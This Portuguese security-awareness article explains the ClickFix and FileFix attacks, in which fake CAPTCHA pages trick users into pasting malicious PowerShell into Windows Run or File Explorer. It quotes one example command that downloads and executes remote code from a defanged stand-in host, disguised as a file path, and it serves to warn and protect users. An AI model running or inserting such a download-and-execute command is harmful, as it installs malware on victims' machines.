ClickFix e FileFix tentam enganar utilizadores com "copy-paste" maliciosos

As técnicas ClickFix e FileFix tentam enganar utilizadores de forma a que instalem inadvertidamente malware nos seus computadores via "copy-paste".

Uma nova técnica de engenharia social chamada ClickFix está a ser usada para enganar utilizadores e levá-los a executar código malicioso nos seus próprios computadores. O ataque começa com um site fraudulento que apresenta uma janela falsa, muitas vezes disfarçada de CAPTCHA. Ao clicar, o site copia código malicioso para a área de transferência do utilizador.

O passo seguinte consiste em convencer a vítima a colar esse código no terminal de linha de comandos do sistema, como o Windows Run. O processo é apresentado como sendo apenas mais um passo para verificar que são humanos, mas na verdade estão eles próprios a infectar as suas máquinas, sendo que na maioria dos casos o código copiado consiste em scripts PowerShell maliciosos, concebido para descarregar e instalar malware.

Se o utilizador cair na armadilha, o código inicia uma cadeia de acções no sistema: descarrega ficheiros adicionais, instala o malware, e regista-se para ser executado automaticamente a cada arranque, garantindo persistência mesmo após um reboot. Tudo isto pode acontecer sem que a vítima perceba o que fez, como demonstrado no vídeo que se segue.

Depois do ClickFix, surgiu agora o FileFix – uma variação da mesma táctica que em vez da linha de comandos usa o explorador de ficheiros como alvo. Esta alteração faz com que o processo se torne mais simples e mais perigoso. Mmuitos utilizadores poderão recear abrir a linha de comandos e considerar essa operação suspeita (e com toda a razão) - mas poderão achar banal e seguro fazer um copy paste para o explorador de ficheiros. O problema é que o conteúdo copiado parece uma comum localização de ficheiro, mas na realidade inclui um comando PowerShell malicioso. Quando o utilizador cola o conteúdo no Explorador, o comando é executado silenciosamente, instalando malware no sistema sem que a vítima perceba.

Exemplo do comando malicioso copiado, que no File Explorer aparece como sendo algo normal.
Powershell.exe -c "iwr malicious[.]site/mal.jpg|iex"
#
C:\Organization\Internal\Drive\Business-RFP.pdf


Assim como no ClickFix, tudo começa com um site comprometido que usa JavaScript para injectar este código na área de transferência. Depois, é o próprio utilizador que, ao seguir as instruções apresentadas, cola esse código fora do browser - neste caso, no Explorador de Ficheiros - permitindo a execução remota de malware como o AsyncRAT, Skuld Stealer, Lumma Stealer, DanaBot, entre outros.

Apesar de parecerem ataques simples, estas técnicas podem dar aos atacantes controlo total sobre o sistema, acesso a dados sensíveis e persistência prolongada no dispositivo comprometido. Como tal, é essencial tratar com grande suspeita qualquer sequência de instruções que pela para os utilizadores fazerem qualquer tipo de "copy-paste", particularmente para locais fora do browser. Para utilizadores mais vulneráveis, poderá também ser conveniente bloquear o acesso automático do browser à area de transferência, inviabilizando ataques deste tipo.